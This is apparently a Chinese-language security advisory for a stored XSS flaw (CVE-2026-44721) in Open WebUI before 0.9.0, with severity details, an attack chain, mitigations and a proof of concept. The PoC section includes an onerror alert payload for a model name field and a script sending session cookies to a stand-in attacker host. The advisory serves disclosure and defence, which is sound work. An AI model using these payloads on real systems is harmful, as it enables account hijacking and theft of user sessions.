CVE-2026-44721 CVSS 7.3 高危

CVE-2026-44721 Open WebUI 存储型XSS漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44721

漏洞类型

存储型XSS

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Open WebUI

漏洞概述

Open WebUI是一个自托管的人工智能平台。在0.9.0版本之前，该产品存在一个存储型跨站脚本（XSS）漏洞。拥有模型创建权限的经过身份验证的用户可以在模型配置中注入恶意JavaScript代码。当其他用户（包括管理员）在聊天界面查看该恶意模型时，注入的脚本将在其浏览器中自动执行，可能导致账户劫持或敏感信息泄露。

技术细节

该漏洞是由于Open WebUI在处理用户提交的模型配置信息时缺乏有效的输出编码机制导致的。在受影响的版本中，系统允许拥有“workspace.models”权限的用户自定义模型参数，但未对这些参数进行安全处理。攻击者可以构造包含恶意JavaScript代码的模型名称或描述，例如通过事件处理器或脚本标签。当这些数据被存储到服务器后，一旦有其他用户（特别是高权限管理员）在聊天UI中浏览或选择该模型，后端会将存储的恶意数据直接渲染到前端HTML中。由于浏览器无法区分合法数据和脚本代码，恶意载荷随即在受害者的浏览器会话中执行。这种存储型XSS攻击具有持久性，且由于针对管理员，攻击者可能利用管理员权限进一步控制整个平台，如上传Webshell或窃取所有用户数据。

攻击链分析

STEP 1

1. 获取权限

攻击者注册或登录Open WebUI账户，并获取模型创建权限。

STEP 2

2. 注入Payload

攻击者创建新模型，在模型名称或描述等字段中写入恶意JavaScript代码。

STEP 3

3. 存储数据

服务器将包含恶意代码的模型信息存储在数据库中。

STEP 4

4. 触发漏洞

受害者（如管理员）在聊天界面访问或查看该恶意模型。

STEP 5

5. 执行代码

浏览器解析未过滤的恶意数据，执行JavaScript代码，攻击者获取受害者权限或数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-44721
1. Login to Open WebUI with model creation permissions.
2. Create a new model.
3. Inject the following payload into the model name or description field:
   <img src=x onerror=alert(document.cookie)>
4. Save the model.
5. Have an admin or another user view the model in the chat interface.
6. The alert box will trigger, demonstrating XSS execution.
-->

<script>
// Example payload to steal session cookies
var img = new Image();
img.src = "http://attacker-controlled-server.com/collect?c=" + document.cookie;
document.body.appendChild(img);
</script>

影响范围

Open WebUI < 0.9.0

防御指南

临时缓解措施

在未升级版本前，应严格限制拥有模型创建权限（workspace.models）的用户数量，仅允许核心管理员创建模型，并教育用户不要在聊天界面点击不明链接或查看不可信的模型。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表